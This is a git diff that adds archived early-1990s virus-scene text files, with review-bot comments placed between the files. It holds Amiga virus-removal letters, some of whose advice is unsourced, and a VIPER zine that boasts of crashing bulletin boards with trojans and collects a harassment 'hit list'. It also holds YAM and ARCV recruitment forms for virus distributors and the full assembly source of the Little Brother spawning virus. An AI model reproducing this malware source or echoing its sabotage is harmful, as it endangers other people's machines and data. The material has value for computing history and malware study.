caught +it, I killed it with VACCINE 2.0 straight away. The best virus killing disk +at the moment is from Discovery Software International. It is called VIP +VIRUS INFECTION PROTECTION. In Australia it costs $79, and you can buy it +in most computer shops. 
+ + If you have the Byte Bandit Virus, and you are working on something, the +virus may very well crash the machine, leaving you with all your hard work +LOST. I'm going to tell you something HIGHLY CONFIDENTIAL which only a very +few Cracking Teams know about. (Credit should go to the POISON CRACKING +TEAM, Australia.) + + If the Byte Bandit crashes your computer, hold down the LEFT ALT, LEFT +AMIGA, SPACE BAR< RIGHT AMIGA< and RIGHT ALT keys all at the same time. +This will give you back your Amiga just long enough (six minutes) to save +your work. + + If you have the Revenge Virus in memory, you can kill it by plugging a +joystick into port two, and holding down the fire button while re-booting. +To confirm that the virus has been killed in the memory of your Amiga, the +screen will turn RED. + + If the Byte-Warrior Virus is in memory and you put an infected SCA Virus +disk in the drive, the power light will flash and you will hear a beep. +This is the "tune" you mentioned in your virus story. + + The INSTALL command in workbench can kill 90% of the viruses around +today. But first, turn OFF you Amiga and make sure you put in a clean +(non-virus infected) disk. + + +............................................................................. + +I hope this article will help some Virus infected user out there... + + Paul M... + + + diff --git a/textfiles.com/virus/amigvir2.txt b/textfiles.com/virus/amigvir2.txt new file mode 100644 index 00000000..5631f7f6 --- /dev/null +++ b/textfiles.com/virus/amigvir2.txt 
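Review bot: the file is a reprinted reader letter whose removal and detection advice (the green flash at boot, the five-key combination after a Byte Bandit crash, INSTALL "can kill 90% of the viruses") is presented as fact with no source beyond the writer's own account, so the commit message should label it as an archived letter rather than as guidance, and the three trailing blank lines before the next file header are stray and could be trimmed if the archive keeps files byte-exact to the original only where the original actually had them.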
@@ -0,0 +1,100 @@ + + + + +AMIGA VIRUS + +By ED EARING + +Although I am not an owner of an Amiga, and although I am not familiar with +much of AmigaDOS, I have read the following disturbing subject in a +couple of other user group publications. I will attempt to make +this report with findings gathered from articles authored by Larry Phillips +(Commodore Users of Bartlesville) and Jo-Ann Nemeth (Commodore Users Group of +Columbus, Ohio). + If you see this message appear: "Something wonderful has happened. Your +Amiga is alive!!!" Please become very concerned. + A European group called Swiss Cracking Association (SCA) is taking +the credit for this latest form of invasion. + The usual chain of events is this: + + An Amiga is booted with an infected disk. All works normally, with +no sign that anything is amiss. If you then reboot the machine with +Ctrl-Amiga-Amiga key, using an uninfected disk, the virus is +transmitted to the boot disk and it too becomes a "carrier," ready to pass it +on again, and so on. + If you have received any copies of programs from anyone ... user group, +friends, bulletin boards ... whatever, it is imperative that you test these +disks BEFORE doing a warm reboot. + So how do you know if your disks are infected already? What do you do? + Bill Koester of Commodore, Inc., has written a program, VCHECK, that +will determine whether a specific disk is indeed infected. The virus writes +to block 0 (zero), and one track 1 (0-1, 1-1). This is the same area used by +some commercial programs to record important disk information. The result +can be the destruction of the commercial program's usefulness. VCHECK +tests your computer's memory to see if it is infected with the virus. 
+ + As a safeguard, until you are able to test your disks, do NOT use an +important and presumedly uninfected disk unless the disk is write protected +before you put it into the drive or if this is not possible, turn the Amiga +off for a minimum of 60 seconds and then on again. To erase the SCA +jokesters' little humor, do an INSTALL of an infected disk from AmigaDOS. The +problem with this procedure is that it rewrites blocks zero, and commercial +programs often use block zero for copy protection so an "Install" could ruin +the program. + Using a program like SECTORAMA (DiskZAP will not show it), look at +Block 1 (cyl 0, hd 0, sec 1). If the virus is present, then run INSTALL. +Then turn the power off/on. If you have booted from an infected disk, and have +used INSTALL to kill the virus (see above), rebooting WITHOUT powering +off/on will only reinfect the disk. + Instructions for 2 drives: + Use Kickstart 1.2 (Amiga 500 already has 1.2 built in). When the +Workbench prompt appears, place your disk with the virus check program in +drive DF0:. This disk will automatically check your current memory. If your +memory is clear of the virus proceed. If not, turn off the Amiga for at least +60 secnds and start the procedure over. + Next, place the suspect disk in drive (either DF1: or DF2: for the A2000) +and type at the "1>" prompt: vcheck1 (return). + If all is well, you will see this message: "Virus Check 1.0 by Bill +Koester (CATS). This disk is healthy." If not, you are told that this disk +has the virus. Then type at the "1>" prompt: install df1: (return). + Should you find that your copy of Workbench is infected, then type at the +"1>" install df1: (return). Now turn the power off/on for the 60 second + interval. + The best advice the writers give is when you receive a new disk place it +in a special place and do NOT use it until you have a chance to test it for +the virus. They include commercial disks in this warning. 
+ I read that the virus-checking program should be on Quantum Link or +GEnie or perhaps some Amiga BBS's. If you have the programs, it would be a +good idea to donate them to your SIG library. + NMCUG Editor's Note: The virus has been found on beta-test (i.e., +pre-release not totally debugged) versions of commercial software, so it +is possible it could appear on brand-new just-out-of-the-box commercial +disks. Supposedly commercial software publishers are rectifying this +situation. +--------------------- +Reprinted from COMMODORE DIMENSIONS, +January 1988, published by New Mexico +Commodore User's Group, P.O. Box 37127, +Albuquerque, NM 87176. + +--------------------- +Some further notes: this text file was written some one-and-a-quarter years +ago, by my time (4/89), and although the information given within is more or +less correct, it is outdated. Since the SCA virus emerged, a slew of others +have appeared, most of which use the same methods to spread themselves (boot +block infection). I will not go into the specifics of these new viruses, but +would recommend that interested parties (ALL Amiga users) get a copy of Steve +Tibbet's program VirusX and read the accompanying documentation, which +goes into more detail about the different viruses. VirusX should be available +through your local Amiga user group or from the Fred Fish collection of disks. + +Some BBSes to call: + +Digit Mail Box (408) 258-5463 3/12/2400b 8N1 Milpitas, CA. BBS of 64/More + Commodore User Group. +HomeBase BBS (408) 988-4004 3/12/2400b 8N1 Santa Clara, CA. SysOp John D. + McAfee head of Computer Virus Industry Association. +OMX BBS (613) 731-3419 3/12/2400b 8N1 Ottawa, Canada. SysOp Steve Tibbet, + author of VirusX. + \ No newline at end of file diff --git a/textfiles.com/virus/amigvir3.txt b/textfiles.com/virus/amigvir3.txt new file mode 100644 index 00000000..139e8a76 Binary files /dev/null and b/textfiles.com/virus/amigvir3.txt differ 
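Review bot: amigvir3.txt is committed as a binary blob ("Binary files /dev/null and b/textfiles.com/virus/amigvir3.txt differ") while its siblings are plain text, so its contents are unreviewable here; it is most likely a high-bit (CP437 or similar) text file that git has classified as binary, and it should either be re-added with a .gitattributes text/encoding rule or its encoding documented so the diff can be read. amigvir2.txt also lacks a trailing newline ("\ No newline at end of file"), which is harmless for an archive but inconsistent with the other files in the same commit. On the content side, the reprint already carries the important caveat that INSTALL rewrites block zero and can break copy-protected commercial disks, so no further note is needed there.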
diff --git a/textfiles.com/virus/anaco001.txt b/textfiles.com/virus/anaco001.txt new file mode 100644 index 00000000..8fb94033 --- /dev/null +++ b/textfiles.com/virus/anaco001.txt 
@@ -0,0 +1,267 @@ +@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$@#$%@#$%@#$% +%$#@ %$#@ +@#$% = ANACONDA - ANACONDA - ANACONDA - ANACONDA - ANACONA = @#$% +%$#@ ********************************************************************* %$#@ +@#$% ** AAA ** @#$% +%$#@ ** AAAA ** %$#@ +@#$% ** AAAAA ** @#$% +%$#@ ** AA AA NN NN AA CCCC OOO NN NN DDDDD AA ** %$#@ +@#$% ** AA AA NNN NN AAA CC CC OO OO NNN NN DD DD AAA ** @#$% +%$#@ ** AA AA NNNNNN AAAA CC OO OO NNNNNN DD DD AAAA ** %$#@ +@#$% ** AA AAAAA NN NNN AA AA CC CC OO OO NN NNN DD DD AA AA ** @#$% +%$#@ ** AA AAAAAA NN NN AA AAA CCCC OOO NN NN DDDDD AA AAA ** %$#@ +@#$% ********************************************************************* @#$% +%$#@ = VIPER - VIPER - VIPER - VIPER - VIPER - VIPER = %$#@ +@#$% @#$% +%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$@ + @#$% @#$% + %$#@ Viral Inclined Programming Experts Ring %$#@ + @#$% Proudly Presents to You... @#$% + %$#@ %$#@ + @#$% ANACONDA #001: The Official VIPER Electronic Mag. @#$% + %$#@ %$#@ + @#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$ + !!! !!! + !!! VIPER are: !!! + !!! * Stingray * Venom * Moribindity * !!! + !!! * Guido Sanchez * !!! + !!! !!! + !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + Greetings: NUKE * SKISM * RABID * HIF + +(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*) + Release Date: 01/22/92 +(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*) +-----> + +Anaconda is the Official VIPER Magazine. We hope to bring you a fairly decent + magazine based on wickedly polluted programs, as well as various interesting + "Compu-Fucks", etc. + +-----> + +Well, alright, we might have overdone it with the snake-like theme, but hey, + it's a lot better than "VIPER" and then maybe a mag called, "12 Octal", and + then have some stupid shit "code handles". 
Anyways, if you think it's lame, + that is fine, but if the next program you run says, "You're VIPERized!" Don't + come crying to us about it. Also, I am not basing on 40 Hex, just trying to + make a point. +VIPER formed about two years ago, and was primarily oriented in a single NPA, + which I don't plan to tell you much about. However, this NPA has more + loosers in it than you would believe, so it was necessary. Sort of. We + did not do very much. A trojan here, a trojan there. But nothing of much + interest. However, 1992 has come, and so we decided that would be a nice + time to pick up our activity. +Here is how the group is currently divided up... + + Stingray (me): Viral/Trojan Development, Crashing and Thrashing + Moribundity : Trojan Development, Crashing and Thrashing, Fake Accounts + Venom : Trojan Development, Supportative Ideas + Guido Sanchez: Viral/Trojan Development, Crashin' -n- Trashing + +-----> + +Within the past few weeks, we have released three programs. Here is a brief + rundown of what is is now available: + + THCK100 .ZIP - The Trojan Horse Construction Kit, v1.00. This simple + program will generate .ASM source code to construct trojans. You supply + the messages, drives to fry, how to fry them... You may also encrypt + the messages, and create unexecutable, uncompressable 'DATA' files to + distribute with. Now even a low-IQ individual can create convincing and + devastatingly vicious trojan horses. + BRENDA .ZIP - The Brenda Virus. A fairly simple tiny virus hack. It is + not much to be desired, but for the true collector, it is a decent + addition at only 255 bytes. Named for a girl at school... + VIPERIZE.ZIP - The VIPERizer Virus, strain A. This will probably be the + virus we will use to take out multiple boards in the same region. The + current versions activation date is Februrary 1st, 1992. After this + date, any program executed has a 1 in 20th chance to cause drive c-z + to be wasted. 
Normally, there is a 1 in 20 chance that an executed + program will display a message and delay for about 30 seconds. + +We also put out various trojan horses but hey, who the fuck cares now that + even a total moron could make one. + +-----> + +Man, I am really sorry that I have to put this in here. But it is more than + necessary. Apparently a lot of you corrupt programmer's, and even you + people who think you are crashers have got some serious problems with your + terminology. We're going to classify them so you can understand. I know + this does not apply to most of you, but when someone gives me a file and + it says, "The Fire Virus 1.00" for the description, and then I look it over + and it turns out that it is a trojan horse, but in the fuckin' unencrypted + text strings in it,it says "The Fire Virus" in it, something is WAY wrong. + + Trojan/Trojan Horse: Simple program that causes damage to a single + computer, and cannot spread. Often designed as + some kinda HD diagnostics or optimizer, etc. When + you think it is doing what it should, it is trashing + files, making directories, wasting sectors, etc. + Examples: HDOPT, FATFUCK, BOOTKILL, etc. + + Time Bomb: Simple program, could be a virus also, that at some + time or date it causes some form of computer damage. + Examples: Friday the 13th Virus, Violator Series, + etc. + + Virus: Program capable of infecting other files with itself. + Can spread to other kinds of computers. There are + many varieties such as Boot Sector, COM and EXE + infectors, etc. Of course, ones such as Jerusalem + can also infect SYS files and Overlays, etc. + + Worm/Network Worm: This is sort of a virus, except it often affects + networks rather than infecting all of a computer, + it might blip over the InterNet in five days or + so. + +A note on overwriting virii: Yes, it is possible they could spread to another + computer, if you copy an infected file, but you would have to be pretty + lame for that to happen. 
Also, there are classes of Virii, such as + encryptive, mutative/metamorphosis, stealth, etc. But, we don't need to get + into that. + +-----> + +Recently, myself and Venom have been using IRC, InterNet chat to piss off the + people in the #warez channel. Perhaps some day you will come and join us!!! + You may also reach us on the InterNet as: stingray@pro-nbs.cts.com. + +-----> + +VIPER has decided that it would be most important to keep accurate records of + true assholes and boards. If you feel that you would like to add to this + list, PLEASE! Mail us the info to the above InterNet address!!! If you would + like yourself to be on our MAILING list to receive Anaconda Magazine when it + is available, let us know at the address, also. Information we are looking + for on lamerz includes their handle, what NPA they're in,soem boards they + frequent, what makes then a laim0r, etc. If you have thier address, and/or + voice, then let us know. If you wish to add a BBS to our hitlist, we'll + need the name, number, SysOp's name, etc. If you have their voice number + address etc. send it along too!!! We will even consider scoring people + various scanners for some of our virii if you add to 'the hit list', so make + a fine addition today!!! +We're primarily looking to kill assholes of all sorts, but mostly the Warez + puppy fucker shits. What kind of life is Warez man!?! Fuck, if you are a + warezwolf and are reading this now, then fuck off you asshole! You are + all going to fry!!! +Finally, VIPERizer, Strain B should be out and about, and source code available + also, within the next few weeks, so be looking forward to it! +Well, I have put up enough bullshit, so now lets see what Guido has to say... + +-----> + + "Ethics and the Urge" + + Howdy all. Well, I'm sure you're looking at this article title and wondering +what the fuck I'm talking about. 
Well, you ever get the feeling, when you're +on what could be the worst board in the world, that you should put this board +out of its misery? NOW you know what the fuck I'm talking about. Lame boards. +This article will cover several ways to dispose of them, and also the ethics +involved in making someone's life miserable just because they are evolution- +arily ranked just below slime mold. +-------------------------------------------------------------------------------- +Case in point #1. +There's a certain board in Colorado, called the Sound Doctrine BBS {303-680- +7209}, and I call up. The place is a high class shareware PD board, with 3 +nodes, CD-ROM , and the +latest version of PKZIP. I logon, figuring I can get myself a few nice and +obscure utilities like LZEXE and so on and so forth. After downloading some +nice french utilities, I realize that the board is a religious board, sponsered +by some church. Yes, the kind of religious board that carries the Adam's Rib +echo, and has an online "game" called 'The Beast' which finds the numerical hex +value of any word you type in . +This sickens me, as I am an agnostic who believes that religion should not mix +with modeming. Of course there's only one thing to do. I shell to DOS, unzip +'WHALE.ZIP' from my \NASTY directory, rename it 'JONAH.EXE' , go into the VIPER Trojan Horse Construction +Kit, create a fake 'JONAH.DAT' file of about 48k length, and write up a +'JONAH.DOC' file which goes a little something like this... + +"Thanks for downloading 'Jonah and the Whale' from your local bulletin board +system! Here are the instructions of the game. Simply make sure the JONAH.EXE +and JONAH.DAT files are in the same directory, and then type 'JONAH'. It's as +easy as that! +How to Play: +Simply use the arrow keys to help Jonah avoid the whale. + +VGA/EGA/CGA SB/Adlib support +Please send me money! Mathurin Picard 1234 fake address" + +And all of that spiel. 
For those of you not up on your 1600s history, Mathurin +Picard was a chaplain who raped nuns in convents, and nailed babies to crosses. +See what King Diamond can teach ya? Well, I zipped the file and uploaded it +as a "keen shareware game!", and then logged off. Here it is, 3 days later. +Does any of the board's lines answer??????? I didn't think so. Score one for +the ol' Weed. +-------------------------------------------------------------------------------- +Ok now I pose the question to you.. is what I did chronicled in the above lines +funny? Damn straight. Is it ironic? Of course!! Now here's the biggy.. is it +RIGHT? ooooh.. lets see why or why not, shall we? Take notes as this could +come in handy when your court date rolls around. First though, here's another +example or five.... +--------------------------------------------------------------------------------- +Case the Second. +There's another board in Illinois, called Solitary Confinement {708-328-0187}, +a so called "ELITE" board. Now, I kinda know the SysOp, his name is madman, +and he's a nice guy and all. But, he has a 486 25, with an 80 meg hard drive. +And here comes the biggy-- 13 of those 80 megs WERE filled with GIFs. And they +WEREN'T the mickey mouse ones, either. Now, GIFs kind of really sicken me, +although I DID go through that phase where I'd DL the latest 700k GRASPRT etc. +etc., but who hasn't???? To help usher madman through this phase, I decided to +do something. He stupidly gave me cosysop accesss, and was pretty stingy on +the security. So I simply wrote up a fake Telegard utility, called TG25SYS, +promising to remove all bugs from TG2.5i . So, what this trojan did was when activated, display a " Determining +Telegard Version Number..." while deleting all of the GIFs, and then "Telegard +2.5i version found! Rebuilding BBS.OVR file..." 
while it constructed a 14 meg +text file with the string "Get a life and a new keyboard- this one's too crusty +because of your GIFs" or something to that extent repeated quite a bit. Then, +it put a loving "At TIME$ on DATE$ you were buttfucked up the ass with a +broomstick" in his system logs. Ah.... that's two....... +-------------------------------------------------------------------------------- +Jeez, what a hellion I am ;). And the final example...... +-------------------------------------------------------------------------------- +Case the Final. +There's yet ANOTHER board, this time in Wisconsin, called Pit of Urine. I don't +have the number in my dialing directory, but oh well. The case here was simple. +It was a wa/>eZ board, and the only thing worse than a wa/>eZ board is a 2400 +baud wa/>eZ board. And it was one of those. So, I called, and uploaded ye +olde Viperizer . Now, the board is down. Ta-dahh. +...that's three... +-------------------------------------------------------------------------------- + +Now that I've recited to you the facts , here's what I've +come up with. + +1) I asked myself, before crashing these boards, three questions. + a) Do they deserve it? + b) Why? + c) Do they have any way of finding out it was me? + +2) The only boards worth crashing are those that misuse our Ambrosia, + knowledge. They do this by.. + a) promoting unfounded beliefs + b) using the knowledge to get sexual gratification + c) devoting their life to such mind candy as Wing Commander II etc at 2400 + +In essence, crashing boards in these fashions is a sort of Cyberpunk Euthanasia +for us. I do it because I believe that these people are misusing knowledge, +and if they continue to do so, it will result in harm to themselves and others +. Others just do it for fun. And that is to be +respected, cause, hey all, lets face it. 
There's nothing more gratifying than +persuading a lamer board's SysOp's little brother or sister into giving you +SysOp access, resulting in the board's demise. Now if only they'd figure out +a way to allow us to see the sysop's face........ + +-----> + + If you wanna contact us for any reason whatsoever, you can mail us at... + + stingray@pro-nbs.cts.com + +Copyright(c) 1992, VIPER Productions. + \ No newline at end of file diff --git a/textfiles.com/virus/apply.yam b/textfiles.com/virus/apply.yam new file mode 100644 index 00000000..8ceb659c --- /dev/null +++ b/textfiles.com/virus/apply.yam 
@@ -0,0 +1,195 @@ + + YAM - [ Youths Against McAffee ] + + +Revised Application Form + + +Position(s) Applying For: + + +Programming Positions Available: +_Virus Programmer [Check All That Apply: _ASM _PAS _C _Other _______] +_Trojan Programmer [Check All That Apply: _ASM _PAS _C _Other _______] +_General Programmer [Check All That Apply: _ASM _PAS _C _Other _______] + (ie. Magazine, Misc. Utilities, etc) + +Misc. Positions Available: +_Courier [I Will Courier: _LD _Local _PD] +_Site Sysop [Modem: _14.4 _2400 _16.8 _Other: _______] + [Hardware: _486 _386 _286 _Other: ________] + [ (HD) _40 _120 _240 _Other: ________] + [# Lines: _1 _2 _3 _Other: ________] + [Acting As Site For: _________________________] + [ (Groups us your board as site)] +_Donator [Total # Virii/Trojans/Sources: ______________] +_Ansi/VGA Artist [Check All That Apply: _Ansi _VGA] + + +I Want To Join YAM Because: + +- +- +- +- +- + + +Have You Ever Previously Released/Programmed Any Virii/Trojans? + +- +If Yes, Which One(s)? 
+- + + +Rarest Virii/Trojans In Your Collection: + +- +- +- +- +- + + +Rarest Source Codes In Your Collection: + +- +- +- + + +Personal Information: + + +Alias/Handle Used: +Real Name: +Real Phone Number [ Voice ] : + [ Data ] : +Address: +City: +Province/State: +Country: +Postal Code: + +Past Alias/Handles Used: + +Have You Ever Been Blacklisted?: + -If Yes, Why?: + : + +Occupation: +(Do You Have Access To Any Classified Computers, Networks, etc) + +Personal Knowledge Section: + + +Do You Phreak?: +How?: + : + +Do You Crack?: +How?: + : + +Do You Hack?: +How?: + : + +Are You An Anarchist?: +What Does Anarchy Mean To You?: + : + : +What Have You Done Lately That Makes You An Anarchist?: + : + : + : + +What Is A Virus?: +What Is The Difference Between A Virus & A Trojan?: +How Would You Compile A Souce Code (Written In ASM): + : +How Would You Dissasemble A Source Code (Written In ASM): + : +What Do You Think Is The Purpose Of Writing A Virus/Trojan?: + : + : + + +References Area: + + +Personal References: (Include Their Area Codes, & Where They Can Be Reached) +- +- +- +- +- + +Do You Know Any YAM Members? [ Past/Present ]: + -If Yes, Which One(s): + : + +What Do You Think About The Programming & Distribution Of Virii/Trojans?: + + +- +- + +In Your Opinion What Is The Best Virus or Trojan Ever Made? 
Why?: + +- +- +- + +If You Do Program, Give Us An Example Of Your Talents: + +- (Include Source Code, or Compiled File With Application) + + +Define: + +YAM: +RABID: +SKISM: +NuKE: +CPI: +BvX: +PHAC: +MtE: +VMB: +PBX: + +Explain: + +40-Hex: +PBX: (Don't Re-Define It) +Blue Box: +Red Box: +Diverter: +Loop: +XOR: +Scan String: + + +Are You Involved With The RCMP, Any Police Division, Any Phone Company, Any +Software Company, Any Computer Company, Any Investigative Bureau, Or Any +Government Funded Projects?: _YES _NO +If Yes, Which One(s)?: + + + Sign Your Alias/Handle Here: + Sign Your Real Name Here: + Sign Your Real Voice Phone Number Here: + +I understand that by signing the above, I am legally binding myself to uphold +the YAM name and to do my best to further the distribution of virii/trojans +around the world. _YES _NO + + +******* Now Call Any YAM Distribution Site, or Any BBS With A YAM Member On + *** It And Use PRIVATE E-MAIL To Send Them Your Filled In Application +******* Form. (eg. Natas Kaupas (YAM Head) TFM)) + + -NK -YAM + [YAM] Youngsters Against McAffee + \ No newline at end of file diff --git a/textfiles.com/virus/arcvnews01.txt b/textfiles.com/virus/arcvnews01.txt new file mode 100644 index 00000000..1bfc02c1 --- /dev/null +++ b/textfiles.com/virus/arcvnews01.txt 
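Review bot: the new file `textfiles.com/virus/apply.yam` carries a `.yam` extension but its content is a plain-text application form, not YAML, so extension-keyed tooling (syntax highlighting, any YAML lint step in CI) will misclassify it. The original file name should stay as-is for a faithful mirror, so add a `.gitattributes` override instead, e.g. `textfiles.com/virus/apply.yam linguist-language=Text` (or one rule for the whole `textfiles.com/virus/` tree). The trailing `\ No newline at end of file` is expected for a byte-exact copy and should not be "fixed" by an editor's auto-formatting on a later commit.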
@@ -0,0 +1,1352 @@ + + The + + + + + The Association of Really Cruel Viruses.Ŀ + + + + Welcome to the first ARCV Newsletter.... + + We hope you are all having a Spiffing Time out there.... + + First lets introduce the 'Team'. + + The Keyboard Basher - Apache Warrior. + The Other One - ICE-9. + + Well you may or may not know that we here are one the only Truly + English Computer Underground Organisation (And just to piss off the + Americans Out there we will spell everything with an 's' not a 'z'). + In this and future newsletters we will be dodging Special Branch and + New Scotland Yard as we go, as well as putting in the odd virus ASM + file, Debug Dump for you all to have fun with. We will also provide + information on what's happening (DUDE) out there in Computer Land. + + Contents. + + 000..........................................................Contents. + 001...................................Virus Spotlight, Little Brother. + 002............................................ARCV Application Forms. + 003.........................What is The ARCV, and Who are its Members. + 004.....................................................Ontario Virus. + 005......................................................Sunday Virus. + 006...........................................................Closing. + + The file in the Archive ARCVVIR.COM is a self displaying List of all + the ARCV Viruses we have produced. (Requires ANSI.SYS) + + + Greetings...To + The Guy Who Wrote CHAOS - Thanks Bud + The Guy Who Wrote FU MANCHU - Are you English? + Patti 'VSUM' Hoffman - We are here to make your Life HELL! + John McAfee - To Think if wasn't for us you'd be Unemployed + The Guy Who Wrote MICHELANGELO - Geta LIFE!!!!!!!!!!!!! + Terry Pratchett - You Are COOOOOOOOL! + And Are Carnivorous Plants Really that Boring? + + +ARCV NEWS 001. + + - Virus Spotlight - + + Little Brother. + + Now this virus, is rather crafty as is relies on good old MSDOS +program handling to work, ie. 
The Fact that .COM files are allways load +before .EXE files. First lets see what Patti has to say. + + Virus Name: Little Brother + Aliases: + V Status: Rare + Discovered: October, 1991 + Symptoms: 307 byte .COM files + Origin: The Netherlands + Eff Length: 307 Bytes + Type Code: SRCE - Spawning Resident .EXE Infector + Detection Method: ViruScan, AVTK 5.54+, F-Prot 2.03+, Novi 1.1d+ + Removal Instructions: Delete infected .COM programs + + General Comments: + The Little Brother virus was submitted from the Netherlands in +October, 1991. This virus is a spawning virus similar in technique to the +Aids 2 and Twin-351 viruses. + + The first time a program infected with Little Brother is executed, +Little Brother will become memory resident in a "hole" in low system memory +in the system data area, hooking interrupt 21. There will be no change in +total system or available free memory. + + Once resident, the Little Brother virus will infect .EXE programs when +they are executed. The .EXE program itself will not be altered, but a +corresponding .COM program will be created by the virus of 307 bytes. This +corresponding.COM program will contain pure virus code and have a date/time +stamp in the DOS directory of when it was created. The following text +strings can be found in the 307 byte .COM files: + + "Little Brother" + "EXE COM" + + Since DOS will execute .COM programs before .EXE programs, whenever +the user attempts to execute a .EXE program, the corresponding .COM program +will be executed first. The .COM program, when finished will then start +the .EXE program the user was attempting to execute. + + Well lets get to the Asm source. 
+--------------------------------------------------------------------------- +cseg segment + assume cs:cseg,ds:cseg,es:nothing + + org 100h + +FILELEN equ quit - begin +RESPAR equ (FILELEN/16) + 17 +VER_ION equ 1 +oi21 equ quit +nameptr equ quit+4 +DTA equ quit+8 + + .RADIX 16 + + +;************************************************************************** +;* Start the program! +;************************************************************************** + +begin: cld + + mov ax,0DEDEh ;already installed? + int 21h + cmp ah,041h + je cancel + + mov ax,0044h ;move program to empty hole + + mov es,ax + mov di,0100h + mov si,di + mov cx,FILELEN + rep movsb + + mov ds,cx ;get original int21 vector + + mov si,0084h + mov di,offset oi21 + movsw + movsw + + push es ;set vector to new handler + + pop ds + mov dx,offset ni21 + mov ax,2521h + int 21h + +cancel: ret + + +;************************************************************************** +;* File-extensions +;************************************************************************** + +EXE_txt db 'EXE',0 +COM_txt db 'COM',0 + +;************************************************************************** +;* Interupt handler 24 +;************************************************************************** +ni24: mov al,03 + iret + +;************************************************************************** +;* Interupt handler 21 +;************************************************************************** + +ni21: pushf + + cmp ax,0DEDEh ;install-check ? + je do_DEDE + + push dx + push bx + push ax + push ds + push es + + cmp ax,4B00h ;execute ? 
+ jne exit + +doit: call infect + +exit: pop es + pop ds + pop ax + pop bx + pop dx + popf + + jmp dword ptr cs:[oi21] ;call to old int-handler + +do_DEDE: mov ax,04100h+VER_ION ;return a signature + popf + iret + + +;************************************************************************** +;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) +;************************************************************************** + +infect: cld + + mov word ptr cs:[nameptr],dx ;save the ptr to the + ;filename + mov word ptr cs:[nameptr+2],ds + + push cs ;set new DTA + pop ds + mov dx,offset DTA + mov ah,1Ah + int 21 + + call searchpoint + mov si,offset EXE_txt ;is extension 'EXE'? + mov cx,3 + rep cmpsb + jnz do_com + +do_exe: mov si,offset COM_txt ;change extension to COM + call change_ext + + mov ax,3300h ;get ctrl-break flag + int 21 + push dx + + xor dl,dl ;clear the flag + mov ax,3301h + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + push cs ;set int24 vec to new handler + pop ds + mov dx,offset ni24 + mov ax,2524h + int 21 + + lds dx,dword ptr [nameptr] ;create the file (unique + ;name) + xor cx,cx + mov ah,5Bh + int 21 + jc return1 + xchg bx,ax ;save handle + + push cs + pop ds + mov cx,FILELEN ;write the file + mov dx,offset begin + mov ah,40h + int 21 + cmp ax,cx + pushf + + mov ah,3Eh ;close the file + int 21 + + popf + jz return1 ;all bytes written? + + lds dx,dword ptr [nameptr] ;delete the file + mov ah,41h + int 21 + +return1: pop ds ;restore int24 vector + pop dx + mov ax,2524h + int 21 + + pop dx ;restore ctrl-break flag + mov ax,3301h + int 21 + + mov si,offset EXE_txt ;change extension to EXE + call change_ext + +return: ret + +do_com: call findfirst ;is the file a virus? + cmp word ptr cs:[DTA+1Ah],FILELEN + jne return + mov si,offset EXE_txt ;does the EXE-variant +exist? 
+ call change_ext + call findfirst + jnc return + mov si,offset COM_txt ;change extension to COM + jmp short change_ext + + +;************************************************************************** +;* Find the file +;************************************************************************** + +findfirst: lds dx,dword ptr [nameptr] + mov cl,27h + mov ah,4Eh + int 21 + ret + + +;************************************************************************** +;* change the extension of the filename (CS:SI -> ext) +;************************************************************************** + +change_ext: call searchpoint + push cs + pop ds + movsw + movsw + ret + + +;************************************************************************** +;* search begin of extension +;************************************************************************** + +searchpoint: les di,dword ptr cs:[nameptr] + mov ch,0FFh + mov al,'.' + repnz scasb + ret + + +;************************************************************************** +;* Text and Signature +;************************************************************************** + + db 'Little Brother',0 + +quit: + +cseg ends + end begin + + Quite a Simple idea for a virus but it works. + + Apche.ARCV NEWS 002. + + Well I thought it could be a good idea if I put in the relevant ARCV +Application forms for any one who may wish to join the ranks of the ARCV. +At the moment we are looking for MAC Virus programmers, and AMIGA Virus +Programmers and others. Also we are looking Couriers for the ARCV (BBS's +for Distribution), that are based all over the world in Britain, USA and +Eastern Europe Mainly but other countries will get equal consideration. so +less of the waffle and to the Applications. 
+ +--------------------------------------------------------------------------- +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + + /////// //////// ///////// // // + // // // // // // // + /////// /////// // // // + // // // // // // // + // // * // // * ///////// * /// + + + THE + ASSOCIATION + OF REALLY + CRUEL + VIRUSES + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + The Association of Really Cruel Viruses + + Courier and/or Membership Application Form + + + For any purpose other than to evaluate this application, the data in all + sections of this application shall not be disclosed outside the internal + leadership of the ARCV. For more ARCV information please see ARCV + prologue. + +--------------------------------------------------------------------------- + + FALSE STATEMENT: A person is guilty of False Statement when he/she + Intentionally makes a false statement under oath or + pursuant to a form bearing Notice. + + You are here to fore-warned... + + FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!! +--------------------------------------------------------------------------- + + PART A: Background Information + + + 1. Date of Application:__________________________________ + + 2. Applicants Name (Last,First,Middle,Maiden): + + ______________________________________________________ + + 3. Applicants Current Handle:____________________________ + + 4. List all other Handles by which you have been known. + + ______________________________________________________ + + ______________________________________________________ + + 5. Residence Address (Number,Street,City or Town,County and Post Code): + + _______________________________________________________ + + _______________________________________________________ + + _______________________________________________________ + + 6. Home Telephone Number (Area Code and Number): + + _______________________________________________________ + + 7. 
